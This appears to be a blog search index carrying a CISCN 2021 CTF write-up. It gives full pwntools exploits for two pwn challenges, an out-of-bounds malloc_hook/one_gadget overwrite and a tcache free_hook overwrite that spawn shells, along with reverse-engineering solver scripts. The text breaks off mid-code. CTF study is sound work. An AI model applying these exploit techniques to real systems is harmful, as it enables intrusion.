search.xml
1726 lines (1377 loc) · 511 KB
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CISCN_2021</title>
<url>/article/CISCN_2021/</url>
<content><![CDATA[<h1 id="CISCN-2021"><a href="#CISCN-2021" class="headerlink" title="CISCN_2021"></a>CISCN_2021</h1><span id="more"></span>
<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="pwny"><a href="#pwny" class="headerlink" title="pwny"></a>pwny</h2><p>All protections are enabled.</p>
<p><img src="/article/CISCN_2021/image-20210517194723531.png" alt="image-20210517194723531"></p>
<p>IDA</p>
<ul>
<li>main</li>
</ul>
<p><img src="/article/CISCN_2021/image-20210517194740860.png" alt="image-20210517194740860"></p>
<ul>
<li>read</li>
</ul>
<p><img src="/article/CISCN_2021/image-20210602204007319.png" alt="image-20210602204007319"></p>
<ul>
<li>write</li>
</ul>
<p><img src="/article/CISCN_2021/image-20210602204021587.png" alt="image-20210602204021587"></p>
<p>In write, the array index can go out of bounds: entering 256 makes the first read land at 0x202860, which leaves fd invalid; the second read then stores 0 there, and from that point on writes can be performed.</p>
<p><img src="/article/CISCN_2021/image-20210602204121951.png" alt="image-20210602204121951"></p>
<h3 id="解题思路:"><a href="#解题思路:" class="headerlink" title="解题思路:"></a>Approach:</h3><p>Use the array out-of-bounds access to obtain arbitrary-address read and write.</p>
<ul>
<li>Enter 0x100 twice; the out-of-bounds index zeroes fd</li>
<li>leak libc</li>
<li>When scanf reads more than 0x400 bytes of data it goes through malloc_hook, so we can make malloc_hook point to realloc + n and realloc point to one_gadget</li>
</ul>
<h3 id="1、fd-置零"><a href="#1、fd-置零" class="headerlink" title="1、fd 置零"></a>1. Zeroing fd</h3><p>Look at the bss segment with vmmap.</p>
<p>On the second read((unsigned __int8)random_fd, &input, 8uLL), fd is an invalid value, so the whole read is a no-op; input is still 0, and that 0 is then assigned to array[0x100] (i.e. fd).</p>
<p><img src="/article/CISCN_2021/image-20210517195700168.png" alt="image-20210517195700168"></p>
<p><img src="/article/CISCN_2021/image-20210517195801362.png" alt="image-20210517195801362"></p>
<h3 id="2、leak-libc"><a href="#2、leak-libc" class="headerlink" title="2、leak libc"></a>2. leak libc</h3><p><img src="/article/CISCN_2021/image-20210602204143302.png" alt="image-20210602204143302"></p>
<p>0x202060 - 0x202040 = 0x20 = 32, and 32/8 = 4</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFC</span>)) <span class="comment"># -4</span></span><br></pre></td></tr></table></figure>
<h3 id="3、计算数组addr"><a href="#3、计算数组addr" class="headerlink" title="3、计算数组addr"></a>3. Computing the array addr</h3><p><img src="/article/CISCN_2021/image-20210602204433065.png" alt="image-20210602204433065"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))<span class="comment"># -11</span></span><br></pre></td></tr></table></figure>
<h3 id="4、修改hook"><a href="#4、修改hook" class="headerlink" title="4、修改hook"></a>4. Modifying the hook</h3><p>Make malloc_hook point to realloc + n, and realloc point to one_gadget.</p>
<h3 id="exp:"><a href="#exp:" class="headerlink" title="exp:"></a>exp:</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(<span class="string">'./pwny'</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node3.buuoj.cn'</span>,<span class="number">29811</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946 12345</span></span><br><span class="line"></span><br><span class="line">elf = ELF (<span class="string">'pwny'</span>)</span><br><span class="line">libc = ELF(<span 
class="string">'./libc-2.27.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendafter(<span class="string">'Index: '</span>,index)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">':'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write2</span>(<span class="params">index,addr</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">': '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">':'</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.send(addr)</span><br><span class="line"></span><br><span class="line">write(<span class="number">0x100</span>)</span><br><span class="line">write(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFC</span>)) <span class="comment"># -4</span></span><br><span class="line">p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line">stderr = <span class="built_in">int</span>(p.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">libc_base = stderr - libc.sym[<span 
class="string">'_IO_2_1_stderr_'</span>]</span><br><span class="line">log.info(<span class="string">'libc_base:0x%x'</span>,libc_base)</span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))<span class="comment"># -11</span></span><br><span class="line">p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line">bss = <span class="built_in">int</span>(p.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">one_gadget = [<span class="number">0x4f3d5</span>,<span class="number">0x4f432</span>,<span class="number">0x10a41c</span>,<span class="number">0xe546f</span>,<span class="number">0xe5617</span>,<span class="number">0xe561e</span>,<span class="number">0xe5622</span>,<span class="number">0x10a428</span>]</span><br><span class="line">one = one_gadget[<span class="number">1</span>] + libc_base</span><br><span class="line"></span><br><span class="line">offset1 = (libc_base + libc.sym[<span class="string">'__malloc_hook'</span>] - (bss + <span class="number">0x58</span> + <span class="number">8</span>))/<span class="number">8</span></span><br><span class="line">offset2 = (libc_base + libc.sym[<span class="string">'__malloc_hook'</span>] - (bss + <span class="number">0x58</span>))/<span class="number">8</span></span><br><span class="line">realloc_off = <span class="number">4</span></span><br><span class="line"></span><br><span class="line">write2(offset2,p64(libc_base + libc.symbols[<span class="string">'realloc'</span>] + realloc_off))</span><br><span class="line">write2(offset1,p64(one))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">': '</span>,<span class="string">'5'</span> * <span class="number">0x400</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="longlywolf"><a href="#longlywolf" class="headerlink" title="longlywolf"></a>lonelywolf</h2><p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"lonelywolf"</span>)</span><br><span class="line"><span class="comment">#p = remote("124.71.230.240","26077")</span></span><br><span class="line">libc = ELF(<span class="string">"lonelywolf"</span>).libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"1"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"> p.recvuntil(<span class="string">"Size: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">data</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"2"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span 
class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"> p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line"> p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"3"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>():</span></span><br><span class="line"> p.recvuntil(<span class="string">"Your choice: "</span>)</span><br><span class="line"> p.sendline(<span class="string">"4"</span>)</span><br><span class="line"> p.recvuntil(<span class="string">"Index: "</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(<span class="number">0</span>))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)</span><br><span class="line"></span><br><span class="line">free()</span><br><span class="line">edit(p64(<span class="number">0</span>)*<span class="number">2</span>+<span class="string">'\n'</span>)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line">heap = u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>)-<span class="number">0x260</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(heap)</span><br><span class="line"></span><br><span 
class="line">edit(p64(heap+<span class="number">0x10</span>)+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)<span class="comment"># in tcache_head add chunk (without head) </span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0x0801010000000000</span>) + p64(<span class="number">0</span>)*<span class="number">12</span> + p64(heap+<span class="number">0x250</span>) + p64(heap+<span class="number">0x260</span>))</span><br><span class="line"><span class="comment"># 0x90 0x80 0x70</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x70 0x80</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#add chunk (without head)</span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>)+p64(<span class="number">0</span>)+<span class="string">'\n'</span>) <span class="comment">#edit chunk size,and overlapping next chunk</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x38</span>) <span class="comment"># add a nobody chunk</span></span><br><span class="line"></span><br><span class="line">edit(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)+<span class="string">'\n'</span>) <span class="comment"># edit </span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x78</span>)<span class="comment"># tcache chunk_addr</span></span><br><span class="line"></span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">"Content: "</span>)</span><br><span class="line">libc.address = 
u64(p.recv(<span class="number">6</span>)+<span class="string">'\x00\x00'</span>) - <span class="number">0x3ebca0</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc.address)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">edit(p64(libc.sym[<span class="string">'__free_hook'</span>]-<span class="number">8</span>)+<span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">edit(<span class="string">'/bin/sh\x00'</span>+p64(libc.sym[<span class="string">'system'</span>])+<span class="string">'\n'</span>)</span><br><span class="line">free()</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h1><h2 id="game"><a href="#game" class="headerlink" title="game"></a>game</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">a=<span class="string">'12345678'</span></span><br><span class="line">b=[]</span><br><span class="line">c=[<span class="number">0xa3</span>,<span class="number">0x1a</span>,<span class="number">0xe3</span>,<span class="number">0x69</span>,<span class="number">0x2f</span>,<span class="number">0xbb</span>,<span class="number">0x1a</span>,<span class="number">0x84</span>,<span class="number">0x65</span>,<span class="number">0xc2</span>,<span class="number">0xad</span>,<span class="number">0xad</span>,<span class="number">0x9e</span>,<span class="number">0x96</span>,<span class="number">0x5</span>,<span class="number">0x2</span>,<span class="number">0x1f</span>,<span class="number">0x8e</span>,<span class="number">0x36</span>,<span class="number">0x4f</span>,<span class="number">0xe1</span>,<span class="number">0xeb</span>,<span class="number">0xaf</span>,<span class="number">0xf0</span>,<span class="number">0xea</span>,<span class="number">0xc4</span>,<span class="number">0xa8</span>,<span class="number">0x2d</span>,<span class="number">0x42</span>,<span class="number">0xc7</span>,<span class="number">0x6e</span>,<span class="number">0x3f</span>,<span class="number">0xb0</span>,<span class="number">0xd3</span>,<span class="number">0xcc</span>,<span class="number">0x78</span>,<span class="number">0xf9</span>,<span class="number">0x98</span>,<span class="number">0x3f</span>]</span><br><span class="line">d=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line"> b.append(i)</span><br><span class="line"></span><br><span class="line">n=<span class="number">0</span></span><br><span 
class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line"> g=b[i]</span><br><span class="line"> n=(n+g+<span class="built_in">ord</span>(a[i%<span class="number">8</span>]))%<span class="number">256</span></span><br><span class="line"> b[i]=b[n]</span><br><span class="line"> b[n]=g</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)):</span><br><span class="line"> c[i]=c[i]^<span class="built_in">ord</span>(a[i%<span class="number">8</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)//<span class="number">3</span>):</span><br><span class="line"> c[<span class="number">3</span>*i+<span class="number">1</span>]=c[<span class="number">3</span>*i+<span class="number">1</span>]^c[<span class="number">3</span>*i]</span><br><span class="line"> c[<span class="number">3</span>*i+<span class="number">2</span>]=c[<span class="number">3</span>*i+<span class="number">1</span>]^c[<span class="number">3</span>*i+<span class="number">2</span>]</span><br><span class="line"> c[<span class="number">3</span>*i]=c[<span class="number">3</span>*i+<span class="number">2</span>]^c[<span class="number">3</span>*i]</span><br><span class="line"></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line">m=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">39</span>):</span><br><span class="line"> n=(n+<span class="number">1</span>)%<span 
class="number">256</span></span><br><span class="line"> g=b[n]</span><br><span class="line"> m=(m+g)%<span class="number">256</span></span><br><span class="line"> b[n]=b[m]</span><br><span class="line"> b[m]=g</span><br><span class="line"> c[i]^=b[(g+b[n])%<span class="number">256</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(c)):</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(c[i]),end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure>
<h2 id="babybc"><a href="#babybc" class="headerlink" title="babybc"></a>babybc</h2><p>LLVM is involved; then open it in IDA.</p>
<p>There are two functions, which encode the various constraints.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">horizontal</span><br><span class="line">row 0001 1000 2001 0000 1010</span><br><span class="line">map[0][3] > map[0][4]</span><br><span class="line">map[1][0] > map[1][1]</span><br><span class="line">map[2][0] < map[2][1]</span><br><span class="line">map[2][3] > map[2][4]</span><br><span class="line">map[4][0] > map[4][1]</span><br><span class="line">map[4][2] > map[4][3]</span><br><span class="line"></span><br><span class="line">vertical</span><br><span class="line">col 00202 00000 00010 01001</span><br><span class="line">map[0][2] > map[1][2]</span><br><span class="line">map[0][4] > map[1][4]</span><br><span class="line">map[2][3] < map[3][3]</span><br><span class="line">map[3][1] < map[4][1]</span><br><span class="line">map[3][4] < map[4][3]</span><br></pre></td></tr></table></figure>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">num1 = []</span><br><span class="line">num2 = []</span><br><span class="line">num3 = []</span><br><span class="line">num4 = []</span><br><span class="line">num5 = []</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i2 == i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span 
class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span>(i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i4 <= i5):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num1.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i2 >= i1 <span class="keyword">or</span> i2 == <span class="number">5</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span 
class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num2.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span 
class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i1 >= i2):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 != <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i4 >= <span class="number">3</span> <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i5 >= i4):</span><br><span class="line"> <span 
class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num3.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span 
class="keyword">or</span> i4 != <span class="number">3</span> <span class="keyword">or</span> i4 == <span class="number">2</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num4.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2 == i1 <span class="keyword">or</span> i2 >= i1):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> <span class="built_in">range</span>(<span 
class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3 == i1 <span class="keyword">or</span> i3 == i2 <span class="keyword">or</span> i3 == <span class="number">4</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i4 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4 == i1 <span class="keyword">or</span> i4 == i2 <span class="keyword">or</span> i4 == i3 <span class="keyword">or</span> i3 <= i4 <span class="keyword">or</span> i4 == <span class="number">3</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">6</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5 == i1 <span class="keyword">or</span> i5 == i2 <span class="keyword">or</span> i5 == i3 <span class="keyword">or</span> i5 ==i4 <span class="keyword">or</span> i5 == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> index = []</span><br><span class="line"> index.append(i1)</span><br><span class="line"> index.append(i2)</span><br><span class="line"> index.append(i3)</span><br><span class="line"> index.append(i4)</span><br><span class="line"> index.append(i5)</span><br><span class="line"> num5.append(index)</span><br><span class="line"><span class="comment">#################################</span></span><br><span 
class="line"><span class="keyword">for</span> i1 <span class="keyword">in</span> num1:</span><br><span class="line"> <span class="keyword">for</span> i2 <span class="keyword">in</span> num2:</span><br><span class="line"> <span class="keyword">if</span> (i1[<span class="number">2</span>] <= i2[<span class="number">2</span>] <span class="keyword">or</span> i1[<span class="number">4</span>] <= i2[<span class="number">4</span>]):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i2[i] == i1[i]):</span><br><span class="line"> flag = <span class="number">1</span> </span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i3 <span class="keyword">in</span> num3:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i3[i] == i1[i] <span class="keyword">or</span> i3[i] == i2[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span 
